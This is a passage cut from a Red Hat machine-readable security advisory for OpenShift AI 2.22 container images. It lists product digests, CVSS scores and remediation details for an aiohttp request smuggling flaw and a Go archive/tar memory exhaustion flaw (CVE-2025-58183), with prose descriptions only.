"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.7,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "aiohttp: AIOHTTP HTTP Request/Response Smuggling"
},
{
"cve": "CVE-2025-58183",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2025-10-29T23:01:50.573951+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2407258"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the archive/tar package in the Go standard library. tar.Reader does not set a maximum size on the number of sparse region data blocks in GNU tar pax 1.0 sparse files. A specially crafted tar archive with a pax header indicating a big number of sparse regions can cause a Go program to try to allocate a large amount of memory, causing an out-of-memory condition and resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: archive/tar: Unbounded allocation when parsing GNU sparse map",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this issue, an attacker needs to be able to process a specially crafted GNU tar pax 1.0 archive with the application using the archive/tar package. Additionally, this issue can cause the Go application to allocate a large amount of memory, eventually leading to an out-of-memory condition and resulting in a denial of service with no other security impact. Due to these reasons, this flaw has been rated with a moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-58183"
},
{
"category": "external",
"summary": "RHBZ#2407258",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2407258"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-58183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58183"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-58183",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58183"
},
{
"category": "external",
"summary": "https://go.dev/cl/709861",
"url": "https://go.dev/cl/709861"
},
{
"category": "external",
"summary": "https://go.dev/issue/75677",
"url": "https://go.dev/issue/75677"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/4Emdl2iQ_bI",
"url": "https://groups.google.com/g/golang-announce/c/4Emdl2iQ_bI"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-4014",
"url": "https://pkg.go.dev/vuln/GO-2025-4014"
}
],
"release_date": "2025-10-29T22:10:14.376000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
